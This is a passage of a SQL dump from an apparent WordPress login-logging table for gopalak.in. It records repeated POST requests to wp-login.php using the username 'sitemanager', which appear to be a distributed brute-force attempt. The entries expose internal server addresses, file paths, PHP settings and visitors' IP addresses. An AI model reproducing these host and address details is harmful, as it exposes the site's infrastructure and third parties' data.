00:00:00'),(94030,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55356\";s:11:\"REMOTE_ADDR\";s:14:\"208.107.66.243\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745465142.134762;s:12:\"REQUEST_TIME\";i:1745465142;}}','208.107.66.243',0,'2025-04-24 08:55:44','1970-01-01 00:00:00'),(94031,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52112\";s:11:\"REMOTE_ADDR\";s:12:\"63.250.32.87\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745465475.413918;s:12:\"REQUEST_TIME\";i:1745465475;}}','63.250.32.87',0,'2025-04-24 09:01:17','1970-01-01 00:00:00'),(94032,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49176\";s:11:\"REMOTE_ADDR\";s:15:\"133.242.131.226\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745465812.2894509;s:12:\"REQUEST_TIME\";i:1745465812;}}','133.242.131.226',0,'2025-04-24 09:06:54','1970-01-01 00:00:00'),(94033,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56792\";s:11:\"REMOTE_ADDR\";s:12:\"195.20.19.31\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745466152.4819911;s:12:\"REQUEST_TIME\";i:1745466152;}}','195.20.19.31',0,'2025-04-24 09:12:34','1970-01-01 00:00:00'),(94034,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55328\";s:11:\"REMOTE_ADDR\";s:13:\"187.33.241.37\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745466491.228781;s:12:\"REQUEST_TIME\";i:1745466491;}}','187.33.241.37',0,'2025-04-24 09:18:13','1970-01-01 00:00:00'),(94035,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46890\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.125.100\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745466831.7396801;s:12:\"REQUEST_TIME\";i:1745466831;}}','198.54.125.100',0,'2025-04-24 09:23:53','1970-01-01 00:00:00'),(94036,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42840\";s:11:\"REMOTE_ADDR\";s:14:\"35.238.203.213\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745467171.5144551;s:12:\"REQUEST_TIME\";i:1745467171;}}','35.238.203.213',0,'2025-04-24 09:29:33','1970-01-01 00:00:00'),(94037,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35290\";s:11:\"REMOTE_ADDR\";s:13:\"51.178.81.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745467515.230865;s:12:\"REQUEST_TIME\";i:1745467515;}}','51.178.81.248',0,'2025-04-24 09:35:17','1970-01-01 00:00:00'),(94038,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57986\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.132.19\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745467853.8822081;s:12:\"REQUEST_TIME\";i:1745467853;}}','66.102.132.19',0,'2025-04-24 09:40:55','1970-01-01 00:00:00'),(94039,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45432\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.137.63\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745468199.2825329;s:12:\"REQUEST_TIME\";i:1745468199;}}','66.29.137.63',0,'2025-04-24 09:46:41','1970-01-01 00:00:00'),(94040,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49904\";s:11:\"REMOTE_ADDR\";s:14:\"199.188.200.73\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUE